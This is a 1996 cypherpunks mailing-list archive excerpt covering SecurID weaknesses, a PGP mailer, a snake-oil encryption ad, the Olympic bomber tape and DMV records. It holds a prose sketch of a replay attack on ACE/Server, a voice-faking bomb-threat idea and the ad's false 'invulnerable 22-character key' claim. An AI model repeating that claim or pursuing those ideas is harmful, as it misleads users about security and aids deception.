> "Why the hell, when you have a tape of the perp. saying something,
> do you not air it in the middle of a city chock full of people
> who could very well know this guy's voice/mannerisms?" Why didn't
> the media ask for it, and then give the answer (the fibbieclerk
> had no answer at all for me) the FBI gave?? Am I missing something?
> We hear 911 tapes ALL THE TIME of various stuff happening. Has the
> FBI suddenly become a bunch of civil liberties activists WRT the


I noticed it too and had a conjecture that the caller said something
politically incorrect which they didn't want aired: like "Fuck
Janet Rhyno".

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjn@nworks.com
Date: Sat, 10 Aug 1996 06:16:28 +0800
To: cypherpunks@toad.com
Subject: Re: anarchy cookbook???
Message-ID: <TCPSMTP.16.8.9.14.40.4.2645935021.660786@.nworks.com>
MIME-Version: 1.0
Content-Type: text/plain


 In> He blew himself up cooking napalm according to his directions.
     ^^ ^^^^ ^^^^^^^ ^^                ^^^^^^^^^ ^^ ^^^ ^^^^^^^^^^


  I hope this was a joke, or you mean: He blew himself up while following
  his directions to cook napalm.


  P.J.
  pjn@nworks.com



... Letterman of Borg - "Ok, Top 10 reasons why resistance is futile:"

___ Blue Wave/QWK v2.20 [NR]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: morgan@keilin.helsinki.fi (Joel Morgan)
Date: Fri, 9 Aug 1996 23:32:39 +0800
To: cypherpunks@toad.com
Subject: Re: Imprisoned for Not Having a Gun?
Message-ID: <199608091141.OAA23296@keilin.helsinki.fi>
MIME-Version: 1.0
Content-Type: text/plain


>From Tim May's posting:
> 
> At 6:57 AM 8/9/96, The Deviant wrote:
> 
> >I agree with you.  I don't have anything against guns, but either
> >requiring them or disallowing them is just plain dumb.  It should be
> >noted that the Supreme Court's interpretaion of "Congress shall make no
> >law" is basicly "no lawmaking body that holds any jurisdiction shall make
> >no law"...
> 
> On this last point, I used to think so, too. However, one of the law
> professors on one of these lists gave various examples purporting to show
> that this is not so, that local jurisdictions can and do pass laws which
> Congress is not permitted to pass.

[I'm not a lawyer, and I can't answer Tim's question per se, but...]

As I understand it, the Bill of Rights itself was conceived strictly as
a set of limitations on the -federal- government, but that the 14th
ammendment has been interpreted to apply the Bill of Rights to limit
state and local governments.  (When and with what scope, I'm not sure.)

Section 1 of the 14th Ammendment:
All persons born or naturalized in the United States, and subject to
the jurisdiction therof, are citizens of the United States and of the
State wherein they reside. No State shall make or enforce any law which
                           --------------------------------------------
shall abridge the privileges or immunities of citizens of the United
--------------------------------------------------------------------
States; nor shall any State deprive any person of life, liberty, or
------
property, without due process of law; nor deny to any person within its
jurisdiction the equal protection of the laws.

(emphasis mine)
-- 
=====================================================================
Joel.Morgan@Helsinki.FI              http://blues.helsinki.fi/~morgan
    "Over the mountains there are mountains."   -- Chang-rae Lee 
=====================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Sat, 10 Aug 1996 08:07:45 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Massively parallel carbon-unit-based voice pattern matching
In-Reply-To: <ae30b876030210049fa8@[205.199.118.202]>
Message-ID: <199608092154.OAA04813@server1.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain



> > "Why the hell, when you have a tape of the perp. saying something,
> > do you not air it in the middle of a city chock full of people
> > who could very well know this guy's voice/mannerisms?" Why didn't
>
> This is the single best suggestion/question I have heard about this
> entire case!

It may not be as good of a suggestion as you might think.  If the
number of false positives are so great that there is no reasonable
way for the FBI to go after everyone of them (that is, say, they
could not accurately weigh the likelihood of any particular siting
as having a reasonable chance of being worthy of investigation),
then such a act is worthless.

Also, the FBI, no doubt, has voice analysis systems much more
capable of detecting subtleties.  100,000 enthusiastic people
trying to recognize their friend/relative/co-worker's voice is just
not consistently accurate enough to give the FBI good leads while
avoiding bad ones.

Now, that said, I suppose the FBI could try something like this:

    Have some randomizing automated test which everyone can call
    into to test their hearing abilities before they can tell the
    FBI their possible lead.  Well, I take that back.  May you test
    them AFTER they leave info on their lead so that they don't get
    offended by the testing.

Well ... I guess I'll leave the exercise up to the FBI (to make the
phone-in more user-friendly).

Now what if the FBI had voice detection systems just like the ones
used in "Clear and Present Danger"?  Now THERE'S a good reason for
tapping 1% of every phone switch ...

I wonder if the public would mind having a MACHINE do drift net
matching on voices on all public phone switches in the U.S. just to
find the Olympic bomber ...  What if the specifications of that
machine were made public and the machine placed under Congressional
oversight?  (At least members of Congress would never get tapped.)

Ern






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cypherpunks@felixhost.felix.org@delfinsd.delfin.com
Date: Sat, 10 Aug 1996 08:33:14 +0800
To: cypherpunks@toad.com
Subject: Fw: SafE Mail Corporation
Message-ID: <9608092200.AA07686@delfinsd.delfin.com>
MIME-Version: 1.0
Content-Type: text/plain

-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

To: cypherpunks@toad.com
Date: Fri Aug 09 15:09:02 1996
Finally -- a 22 character public key that's "invulnerable to attack."

- -----Begin Included Message ----- 

Date: Fri, 9 Aug 1996 14:42:56 -0400
 From: safemail@ntrnet.net (M.Wagoner (1))
To: law-office@felix.org
Cc: 

FINALLY, SOFTWARE THAT COMPLETELY ENSURES THE CONFIDENTIALITY OF 
PRIVILEGED ATTORNEY/CLIENT INFORMATION OVER THE INTERNET!

If you are at all concerned about the security of documents that 
your firm regularly sends via e-mail, or about the confidentiality, 
integrity and size of documents currently affecting your 
transmission speeds, please read the following..........

SafE Mail=AE is a new, proprietary software product that provides 
information security through encryption, compression, error 
correction, INTERNET compatibility and, it is compatible with ANY 
electronic mailing system. 

Comparisons of SafE Mail's encryption against leading competitors 
revealed that SafE Mail's encryption key was longer and compression 
greater than any similar product available today and that SafE Mail 
offers error correction (also not available with similar products) 
of up to 30% which can typically occur during transmissions.  SafE 
Mail's proprietary technology is based on the concepts of private, 
public key and signature authentication and, it is supplied on a 
single diskette.  

SafE Mail utilizes a short 22 character public key (invulnerable to 
attack) which makes exchanging data secure and simple to do.  This 
information security software is the most secure and easiest to use 
on the market today. 

I have included some information that describes the features of 
SafE Mail I think will be of most interest to you.  If you would 
like more information, a copy of our "Frequently Asked Questions", 
or are interested in obtaining a nominal cost "demo" to evaluate 
the software yourself, please call us today. 

Thank you,
Randy Estridge
SafE Mail Corporation
1-800-252-9938
http://www.sfmc.com


SafE Mail  FEATURES
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
SafE Mail proprietary encryption and decryption of data, includes 
virtually any kind of computer generated information: text, video, 
audio, executable files, databases, spreadsheets, pictures, or any 
other kind of ASCII or binary files

*  Superior proprietary compression algorithm for fastest and most 
cost effective data transmission 

*  Powerful proprietary algorithmic control for error correction 
during transmission over noisy networks

*  Public Key distribution algorithm for exchanging presigned 
encrypted data over open networks

*  Electronic Signature protocol for exchanging presigned mail

*  User defined variable level of distortion protection that can be 
applied when using low quality transmission facilities

*  Long cryptographic key with a nearly infinite number of output 
codes

*  Multiple encryptions for extra security

*  Universal Secure Envelope format

*  Internet compatible output format

*  Easy procedure for use under Windows=AE

P.S.  Special, introductory pricing is only available this month!


Randy Estridge
SafE Mail Corporation
http://www.sfmc.com
1-800-252-9938



- ---- End of forwarded message ----
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMgu3Ai1djiVVpb+9AQGeewP/Q4jm/RA5HBm7IK4n6DnaQhiv6uA3OYuc
VulJtyBsV00TfcBT1FkNT/8fpr5LjIVb5PWh8WYrsoB912YnwDLi2H052jNpP1lv
DJQxq2oAQAB3VHqUFqXLVJb21iAKcaBNthObsQm1Fe6NJdH4xnNF2xX0aIBwlqNi
X6xGS24cJAk=
=IzPn
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Minow <minow@apple.com>
Date: Sat, 10 Aug 1996 08:16:09 +0800
To: pjb@ny.ubs.com (Paul J. Bell)
Subject: Re: SecurID
In-Reply-To: <9608091601.AA02324@sherry.ny.ubs.com>
Message-ID: <v03007803ae3165aaac72@[17.202.12.102]>
MIME-Version: 1.0
Content-Type: text/plain


I've been using SecureID for the better part of a year now and am
quite pleased with the way it works.  Here are the negatives,
though they are not very interesting:

-- There is a false rejection rate of around 2-5% (failure to login
   with my presumably valid SecureID card). This includes modem
   bobbles and database crashes. It generally is self-correcting.
-- Dialup access only. This would prevent me to access my mail server
   (which is inside the firewall) from telnet.
-- Interactive access only; I can't program my home machine to dial
   in at 5:00 AM to read mail without intervention.
-- We have a mixture of direct and 800 number dialups -- this presumably
   protects against problems unique to a single server.

In my case, SecureID is integrated into ARA (Apple Remote Access).
Client installation was trivial. I don't know what, if any, link-encryption
is incorporated.

The user overhead is about 30 seconds per dialup.

Martin Minow
minow@apple.com


>someone at my firm is about to press the securid system down our collective
>throats. please point me to the recent thread on this subject, and/or point
>me to some url's or the like, or to someone who has some firsthand knowledge
>of the pitfalls and/or vulnerbilities of secirid.
>
>cheers,
>	-paul
>







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vin@shore.net (Vin McLellan)
Date: Sat, 10 Aug 1996 06:50:30 +0800
To: cypherpunks@toad.com
Subject: Re: F2 hash?
Message-ID: <v02130503ae313d72ccb8@[206.243.160.206]>
MIME-Version: 1.0
Content-Type: text/plain


        .
         Jüri Kaljundi <jk@stallion.ee> noted that "Mudge," a fabled hacker
long associated with the elite clique "Cult of the Dead Cow," (honest!) had
been scheduled to speak on SecurID vulnerabilities at DefCon in Vegas two
weeks ago.

>>| At Defcon this year they promised to tell about some security
>>| flaws in SecurID tokens, anyone know more about that?

        Adam Shostack <adam@homeport.org> primed the pump:

>>       My understanding is that the guy who was going to give the
>>talk had nda difficulties.  Vin?  Did you make it out?  The talk was
>>going to be on race conditions, denial of service attacks, and the
>>like.

        Yup.  SDTI asked me and their Principal Engineer, John Brainard, to
wallow in the delights of Vegas and attend Mudge's scheduled speech at the
DefCon hackers' convention.

        Not knowing that half of the people over 30 attending DefCon would
be FBI agents (not undercover; wearing FBI/DefCon IV-embazoned polo shirts,
and passing out _lots_ of G-man recruiting literature! No kidding!) the
Powers That Be at SDTI selected John and I,  from the girded ranks of their
employees and sundry consultants, as either the least likely to squander
our personal fortunes at craps, or the most likely to fit in among the
(little)bit-perverted odd-balls who gather at DefCons.

        I refuse to speculate as to which (but I think I've finally got the
knack of card-counting at blackjack;-)

       As Cerridwyn Llewyellyn <ceridwyn@wolfenet.com> reported, Mudge --
posed and celebrated on page 40-something of last month's WiRed -- told the
DefCon audience that SDTI's lawyers were after him, threatening something
dire, so he was not going to release his "white paper" on weaknesses in the
ACE/SecurID system for several months.  Instead, he delivered a talk on
s/key vulnerabilities.

        This was weird, because I *knew* Security Dynamics had neither
consulted nor asked their lawyers to do anything about Mudge's speech on
SecurID vulnerabilities.  It would have been a fool's ploy: silly and
counterproductive.

        John and I took Mudge out for dinner right after that speech. He
told us then that he had inadvertently misspoken when he blamed his
temporary silence on SDTI's lawyers. The real problem, he said, was with
bullying lawyers from two corporate clients he is now under contract to in
his day job.

        (He didn't explain this further, but I understood that Mudge is
working for two firms which have access to SDTI plans and trade secrets
under non-disclosure agreements.  The firms were apparently worried about
their liability -- given their promises to SDTI and Mudge's work in their
employ.  Mudge may want to elaborate on this.  Or not.)

        Mudge is a very sharp guy; a hacker in the old sense of a system
maven -- despite his beer-swillin' Dead Cow Cult role-playing.  Off stage,
he spoke freely about which attack vectors he's been working on, but
offered limited detail.  (My impression was that when the
conflict-of-interest stuff came up, Mudge put aside his analysis of SecurID
authentication for awhile... but intends to work on it further, once free
of other obligations.)  He and SDTI's John Brainard got along well,
nattering to each other in machine code (which another DefCon luminary who
joined us, *Hobbit*, would ocassionally translate for me.)

        Mudge is deeply involved in analyzing the ACE client/server code
for weakness; he too is also very interested in the F2 algorithm -- which
he felt involves too much knowable information as input to the hash -- and,
of course (like Shimomura, the self-styled Threat of the West,) Mudge is
stolidly pounding away at the SecurID itself to retrieve and cryptoanalyze
the algorithm that hashes Current Time and the token's secret key to
generate a SecurID token-code.

        John Brainard -- who wrote the SecurID hash ten years ago -- openly
admired Mudge's ingenuity but didn't seem to feel particularly threatened.


        Mudge and John also talked about various potential high-level
protocol attacks on the network infrastructure and how they could possibly
be used to isolate a Master ACE/Server from a (backup) Slave -- with an
attacker able to both sniff incoming traffic to the Master and replay it to
the Slave (after the Slave had been artificially trapped on an isolated
subnet by the attacker.)  The discussion was out of my league, but I
enjoyed watching the vollying back and forth.

        The whole exchange was fun and reminded me of the healthy
relationship hackers in the user community used to have with product
designers.  My beard is gray.  I remember when the lead programmers for the
best time-sharing companies used to send a bottle of good booze to anyone
who alerted them to security problems in their systems.  A good tradition,
IMNSHO -- and one which I tried to continue when I picked up the check for
our dinner and Mudge's choice of wine.  (I'll bill SDTI;-)

        All the recent effort to bust the decade-old SecurID algorithm and
the ACE network protocol seem a little anachronistic, of course.  I suppose
it's kind of a grand salute to an old security warhorse (and SecurIDs are
still the first line of defense in most Fortune 500 companies.)  There has
been no formal announcement, but -- as Jüri suggested -- I think most of
the ACE/SecurID user community expects that both the network protocol and
the token's internal algorithm will be upgraded sometime in the very near
future.  (On a timeline SDTI established several years ago.)  And any new
ACE protocol will inevitably establish a stateful session for the
authentication exchange -- which will make the current generation of race
attacks historical novelties.

        SDTI Engineering (and most likely RSA Labs) have probably been
banging away at the new design for a long time.  RSA was deeply involved
with SDTI long before their recent merger;  RSA helped develop the F2 hash
that is used in the ACE client/server security protocol.  (It's this F2
hash that "Anonymous" is begging some Cypherpunk to steal,
reverse-engineer, and publish for everyone to play with.  Bad, bad,
commercial crypto!  Wouldn't want anyone to make money off strong
cryptography, would we??)

        It remains to be seen where the merger of the top OTP firm and the
top commercial crypto firm leads us --  but I, among many, hope the
widely-installed ACE/Server (with its potent RDBS) will provide the
key-management infrastructure that will allow the introduction of
enterprise-wide crypto on a scale seen only in the nightmares of the NSA's
congressional lobbyists.

        Mr. Gilmore is not the only one who has been plotting to vastly
expand the installed base of strong crypto in the coming year.

        Suerte,
                        _Vin


         Vin McLellan +The Privacy Guild+ <vin@shore.net>
      53 Nichols St., Chelsea, Ma. 02150 USA Tel: (617) 884-5548
                         <*><*><*><*><*><*><*><*><*>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: geoff@commtouch.co.il (geoff)
Date: Sat, 10 Aug 1996 01:15:06 +0800
To: provos@wserver.physnet.uni-hamburg.de
Subject: Re: PGP Mailer for the masses ?
Message-ID: <19960809124443785.AAA218@[194.90.103.93]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: provos@wserver.physnet.uni-hamburg.de, coderpunks@toad.com,
 cypherpunks@toad.com
Date: Fri Aug 09 15:56:37 1996
Niels,

Thanks, for describing the features of Pronto Secure :)
This is how Pronto Secure matches up to your checklist:

> Here is just a short list what such a programm should be able to
>  do: ( all options should be optional ;)
> 
> Sending Mail:
> - Clear signing of outgoing mail
YES

> - If public key of recipients is known encrypt with those keys
YES

> - If there is access to a public keyserver try to get a public key
>   for the recipients
YES

> Receiving Mail:
> - While reading mail ( similiar to premail ) try to check existing 
>   signatures if public key is available otherwise try to get 
>   public key from server
YES (do on the fly signature checking as mail arrives in inbox)

> - Traverse the web of trust and show how the public key is
>    related to one own keys to mutual signatures on other public keys
>    ( For example mean distance to a key signed by the recipient
>    himself )
NO  (we handle certification by allowing the user to modify a list of  
    trusted certifiers for signing keys)

> - If the mail contains a public key add it to the keyring
NO  (Key is shown as an attachment icon double click on it adds it to  
   the keyring)

> - Don't show pgp blocks in Mail since they might confuse
YES

> Keymanagement:
> - Should be integrated in the addressbook together with E-Mail
>   Address and name.
YES

> - Keys should be imported via generation or via mail or via a file
YES (or the clipboard)

> - If you have a public key without an entry in the addressbook
>   take the EMail and Name from the public key
YES (or prompt user to supply address)

> - One should be able to sign the keys during import if origin is
>   known
NO  (signing keys is a separate process. This gives the user an     
opportunity to authenticate on another channel)

> Misc:
> - Passphrase should be kept in memory for a definable time, 0 for
>  immediate deletion, thus you would be prompted for the passphrase 
>  each time you use it. Question about Windows Swapspace ? or tag the 
>  memory as uncacheable ?
NO (Keyboard sniffing is too easy to do in Windows, This would give    
   a false sense of security)

> I would suggest creating a library with seperate io and gui parts in
> order to motivate peeple in helping who do not want to support 
> mainstream products like Windows. Like taking the PGP 3.0 lib ( is it 
> out yet ?) and modify it a bit.
YES (Separating UI from security functionality is also the right       
   way to go for offering plug in security providers)
 
> Since there are a variety of good functioning mailers available
> already it wouldn't make sense developing the whole stuff but instead 
> only integrate the library into existing products.
NO  (It will not be an easy task to design a general library of UI    
   elements that any mail client will be able to seemlessly plug into.)

> Do you think that such proposal is senseable and that there are
> people who would be willing to support the idea with programming 
> affords ?

It exists. Plus a few additional features not mentioned, and a much 
longer wish-list in the process of being implemented.

Check it out. It is available from http://www.commtouch.com/p1.htm

IMPORTANT: COMMTOUCH WILL GIVE A FREE COPY OF PRONTO SECURE TO ANY 
MEMBER OF THE CODERPUNKS/CYPHERPUNKS LISTS SUPPLYING USEFUL FEEDBACK 
ABOUT THE PRODUCT.

The impressions of early users of Pronto Secure can be viewed at: 
http://www.commtouch.com/testers.htm (many of whom are list members)

Regards, Geoff.



- ---------------------------------------------------------------
Geoff Klein, Pronto Secure Product Manager;   www.commtouch.com 
My PGP public Key 1814AD45 can be obtained by sending a message
to geoff@commtouch.co.il with "Get PGP Key" as the subject.
- ----------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBMgs1ikLv5OMYFK1FAQGe/gP/RdXtVIwo7aupkJn6X4VNTuNHHymPf9fJ
k7FAsONAAP9qbr4UaWzJXxWuvmxLgt5gsMpk6yzp6vY80krQqPf6SqphW7FOjGTq
PB05bNLDHm9SRGjVvKRHzGbOr094gkFpeso2C3MeMiDbT0J5gsLJOeMJsIb4NW2A
lHZ6e+o535w=
=R2jc
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 10 Aug 1996 10:09:12 +0800
To: "P. J. Ponder" <cypherpunks@toad.com
Subject: Re: John Gilmore on the Radio!
Message-ID: <199608092254.PAA24182@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:38 PM 8/9/96 -0400, P. J. Ponder wrote:
>Today at lunchtime in the Eastern Time Zone, the radio show Real 
>Computing with John C. Dvorak had John Gilmore as a guest,


>Gilmore was referred to by Dvorak as the head of the cypherpunks a few 
>times.  

What was that old saying, "Like herding cats"?
Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sat, 10 Aug 1996 07:39:28 +0800
Subject: Re: Drive the SF Central Freeway, have your license plate photo'ed.
In-Reply-To: <ae3023570a0210043726@[205.199.118.202]>
Message-ID: <Pine.SV4.3.91.960809155652.21848B-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain



A May unit wrote:


"bubbleheaded hairspray journalists"
                        ~~~~~~~~~~~~


wrong word. They are truly nothing more than actresses.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Niels Provos <provos@ws1.physnet.uni-hamburg.de>
Date: Sat, 10 Aug 1996 02:40:02 +0800
To: geoff <geoff@commtouch.co.il>
Subject: Re: PGP Mailer for the masses ?
In-Reply-To: <19960809124443785.AAA218@[194.90.103.93]>
Message-ID: <Pine.A32.3.94.960809153630.15623A-100000@ws1.physnet.uni-hamburg.de>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 9 Aug 1996, geoff wrote:
> Thanks, for describing the features of Pronto Secure :)
> This is how Pronto Secure matches up to your checklist:
> > - Traverse the web of trust and show how the public key is
> >    related to one own keys to mutual signatures on other public keys
> >    ( For example mean distance to a key signed by the recipient
> >    himself )
> NO  (we handle certification by allowing the user to modify a list of  
>     trusted certifiers for signing keys)
I personally would find it useful if you could get a measure of
trustworthy ness due to keydistance. Like that if I knew that the sender
is only 2 keys away from my own I would most likely trust his public key
to be the original, it would be nice to see the signing people involved
though:
Max Miller 
  |-signed- a friend of mine <-signed- me
  |-signed- Molly Malone <-signed- Someone <-signed- friend <- signed me

According to http://bcn.boulder.co.us/~neal/pgpstat/ there were 19124 keys
in the keyserver but the biggest werb of trust had only 1291 keys and
the next only 16 keys. The mean key distance was between 6 and 7.
That means that you don't have to get too many public keys in order to
find the connection to your key and on the other hand it might show that
calculating trust according to keydistance isn't worth is since the web
of trusts are so small. But I figure if you would show the connection of
keys in your mailer it might encourage people to participate in key
signing parties.

> > Misc:
> > - Passphrase should be kept in memory for a definable time, 0 for
> >  immediate deletion, thus you would be prompted for the passphrase 
> >  each time you use it. Question about Windows Swapspace ? or tag the 
> >  memory as uncacheable ?
> NO (Keyboard sniffing is too easy to do in Windows, This would give    
>    a false sense of security)
How would you get the pass phrase if not via the keyboard ? And if you
keep it in memory till you sign off ( like in premail ) you would only
have to type it once, though capturing the pass phrase once is normaly
enough.

> > I would suggest creating a library with seperate io and gui parts in
> > order to motivate peeple in helping who do not want to support 
> > mainstream products like Windows. Like taking the PGP 3.0 lib ( is it 
> > out yet ?) and modify it a bit.
> YES (Separating UI from security functionality is also the right       
>    way to go for offering plug in security providers)

Though I think that Pronto Secure will help spread the use of cryptography
I would prefer a source code distributed library which could handle most
of the stuff needed including for example preparing encrypted requests to
key servers ( via anonymous remailers or not )( it keyservers will
implement encrypted requests ) or calculating the key distance if possible
with the available keys.

I guess one should wait for the arrival of the pgp 3.0 lib and evaluate
what it can and can't.

Greetings
 Niels Provos =8)

- - PHYSnet Rechnerverbund     PGP V2.6 Public key via finger or key server
  Niels Provos               
  Universitaet Hamburg       WWW: http://www.physnet.uni-hamburg.de/provos/   
  Jungiusstrasse 9           E-Mail: provos@wserver.physnet.uni-hamburg.de
  Germany 20355 Hamburg      Tel.:   +49 40 4123-2504     Fax: -6571 

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1

iQCVAwUBMgtHOcweILHCAJhBAQFtyQQAo+UQF3KmpAIIQ/rEh1JHHAsQUBd9k6dk
OB2lfer/dV+kDUrgpW3CDP/GdlgMIl6LCReJz6pXTA1RShQ74cdB0HokQDfytfJW
pWjHbnUcrfCmotG4KjcWw4MBJLXLbBGY0yqcmhTiOCTpLNuv52Tvtz86vOwe4yxq
ysXIXokGJpw=
=5An3
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 10 Aug 1996 09:32:34 +0800
To: Ernest Hua <hua@chromatic.com>
Subject: Re: Massively parallel carbon-unit-based voice pattern matching
Message-ID: <199608092330.QAA26402@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:54 PM 8/9/96 -0700, Ernest Hua wrote:
>Now what if the FBI had voice detection systems just like the ones
>used in "Clear and Present Danger"?  Now THERE'S a good reason for
>tapping 1% of every phone switch ...
>
>I wonder if the public would mind having a MACHINE do drift net
>matching on voices on all public phone switches in the U.S. just to
>find the Olympic bomber ...  What if the specifications of that
>machine were made public and the machine placed under Congressional
>oversight?  (At least members of Congress would never get tapped.)

Voiceprints used to be doable only with sophisticated, specialized 
equipment.  Presumably, they would be doable today with "only" a PC and 
soundcard, along with some software.  This raises an interesting question:  
Would it be possible to modify speech to remove the identifiable 
characteristics which came from the speaker, and replace them with those of 
some other person.  

In other words, could somebody fake a bomb threat using a recording which 
has been processed to sound "exactly" like some famous person whose voice 
you can analyze?  


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P. J. Ponder" <ponder@freenet.tlh.fl.us>
Date: Sat, 10 Aug 1996 07:37:14 +0800
To: cypherpunks@toad.com
Subject: John Gilmore on the Radio!
Message-ID: <Pine.A32.3.91.960809160856.44399A-100000@fn1.freenet.tlh.fl.us>
MIME-Version: 1.0
Content-Type: text/plain


Today at lunchtime in the Eastern Time Zone, the radio show Real 
Computing with John C. Dvorak had John Gilmore as a guest, and Dvorak 
asked several questions about the US federal case against Phil 
Zimmerman.  Surprising how little Dvorak knew about the issues, 
especially considering he's a pretty bright guy and up-to-speed with the 
technology.  He asked JG [paraphrasing] - now that the government case 
against PRZ is dropped, what else is the Electronic Frontier Foundation 
(of which Gilmore is a board member) taking up as its next 'cause'?

The implication was that the 'crypto thing' is settled and we can move on
to other issues.

This may have been a rebroadcast of an earlier show, I don't know.

Gilmore was referred to by Dvorak as the head of the cypherpunks a few 
times.  






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jonathon <grafolog@netcom.com>
Date: Sat, 10 Aug 1996 04:35:05 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Oregon License Plate Site in the News Tonight!
In-Reply-To: <2.2.32.19960809093040.0092e510@panix.com>
Message-ID: <Pine.SUN.3.95.960809163408.14975A-100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


	Duncan:

On Fri, 9 Aug 1996, Duncan Frissell wrote:

> cause California to somewhat restrict license and registration information.
> I think they eased up though later.  I don't know who can get info there

	You have to register as a company with CA DMV.  Pay them an
	annual fee, and a per report pulled fee, and only pull 
	records for a _legitimate business need._  

	Addresses are only provided if a court case the target 
	of the search is listed as being involved in.  Docket #
	must be listed -- which gives rise to some interesting 
	problems.

> This particular problem can be avoided privately by reporting a mail drop
> rather than your real address to the state.

	Depends upon the state.   In some states it is a misdemeanor
	to list anything other than your physical address.  Others
	don't care what you list, so long as mail can be delivered
	there.  

	More important is ensuring that all the addresses that the 
	state has on you are the same.  The preference seems to be 
	to have the same address as is on one's checks.  

	What I've noted some people do, is give their physical address,
	and provide a mail address as well.  Then the individuals move, 
	and omit to notify the state of the move.  When questioned about
	it, their usual response is something along the lines of "
	I get all of my mail at my mail box. I did not 
	realize that I had to file a change of address form, with you.
	After 
	all the address on my licence is the address where I get my
	mail.  [  In most states the mail address is the address listed
	when two addresses are provided. ] "

        xan

        jonathon
        grafolog@netcom.com



		VapourWare is like the Tao,
		Looked for it cannot be found,
		Reached for it cannot be touched,
		Waited for not even FedX can deliver;
		            <Paid for it will not be refunded>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Sat, 10 Aug 1996 10:17:34 +0800
To: cypherpunks@toad.com
Subject: Re: John Gilmore on the Radio!
In-Reply-To: <Pine.A32.3.91.960809160856.44399A-100000@fn1.freenet.tlh.fl.us>
Message-ID: <Pine.GUL.3.95.960809165855.15077A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 9 Aug 1996, P. J. Ponder wrote:

> Gilmore was referred to by Dvorak as the head of the cypherpunks a few 
> times.  

Did he mention any other body parts?

(Hey, shouldn't there be a SF Bay Area cpunks meeting tomorrow? I'm
otherwise engaged, but I'd have expected to see an announcement of what I'm
missing.) 

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremey Barrett <jeremey@forequest.com>
Date: Sat, 10 Aug 1996 10:38:42 +0800
To: cypherpunks@toad.com
Subject: Re: Fw: SafE Mail Corporation
In-Reply-To: <9608092200.AA07686@delfinsd.delfin.com>
Message-ID: <Pine.BSI.3.93.960809172215.10361I-100000@descartes.forequest.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> Date: Fri, 9 Aug 1996 14:42:56 -0400
>  From: safemail@ntrnet.net (M.Wagoner (1))
> To: law-office@felix.org
> Cc: 
> 
> FINALLY, SOFTWARE THAT COMPLETELY ENSURES THE CONFIDENTIALITY OF 
> PRIVILEGED ATTORNEY/CLIENT INFORMATION OVER THE INTERNET!
> 
> If you are at all concerned about the security of documents that 
> your firm regularly sends via e-mail, or about the confidentiality, 
> integrity and size of documents currently affecting your 
> transmission speeds, please read the following..........
> 
> SafE Mail=AE is a new, proprietary software product that provides 
> information security through encryption, compression, error 
> correction, INTERNET compatibility and, it is compatible with ANY 
> electronic mailing system. 

[ blah blah blah blah blah.... ]

Not this again...

- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Jeremey Barrett
Senior Software Engineer			jeremey@forequest.com 
The ForeQuest Company       			http://www.forequest.com/

   "less is more."
		-- Mies van de Rohe.

   Ken Thompson has an automobile which he helped design.  Unlike most
   automobiles, it has neither speedometer, nor gas gage, nor any of the
   numerous idiot lights which plague the modern driver.  Rather, if the
   driver makes any mistake, a giant "?" lights up in the center of the
   dashboard.  "The experienced driver", he says, "will usually know
   what's wrong."

		-- 'fortune` output

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMgvWii/fy+vkqMxNAQEPLwP8DF+sIbGTqiyDi+i04eWjnNjOiXn3iWsq
9ypWK1TLA/FVU23VFIO5jJ58pT3HQwk2fo//VWmkVbdPl4rMbBxEt7/19xL++lmH
lE97b6fcOmGaToFOUejZizJWs1QVGqZ0LI9DArRrfjL6QfRgyb6c5yHEWbw26XT7
QwX92V7haG4=
=XY8w
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
